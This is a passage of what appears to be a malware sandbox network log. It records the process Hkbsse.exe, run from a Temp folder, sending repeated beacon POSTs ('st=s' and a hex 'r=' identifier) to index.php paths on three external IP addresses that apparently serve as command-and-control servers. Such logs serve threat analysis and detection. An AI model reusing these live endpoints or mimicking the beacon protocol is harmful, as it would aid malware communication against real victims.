Aug 27, 2024 14:19:29.152215004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	52222	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:29.146737099 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	52223	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:29.271238089 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:29.944858074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:29.945759058 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:30.179105043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	52224	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:30.301059961 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:31.171866894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:31.172655106 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:31.409513950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	52225	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:30.753997087 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	52226	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:31.521174908 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:32.199358940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:32.202038050 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:32.439558983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	52227	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:31.552706957 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	52228	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:31.552752018 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	52229	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:32.550997972 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:33.229038954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:33.241228104 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:33.482312918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	52230	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:33.202692032 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	52231	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:33.602741003 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:34.297353029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:34.298187017 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:34.574062109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	52232	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:34.697031975 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	52233	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:34.895878077 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	52234	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:35.535619974 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	52235	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:35.535717010 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	52236	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:35.535757065 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:36.363821030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	52237	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:36.504146099 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:37.226305008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:37.227051973 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:37.492486000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	52238	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:37.285243034 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	52239	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:37.614106894 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:38.405477047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:38.406321049 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:38.690541983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	52241	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:38.827178001 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:39.509700060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:39.510641098 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:39.794229984 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	52242	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
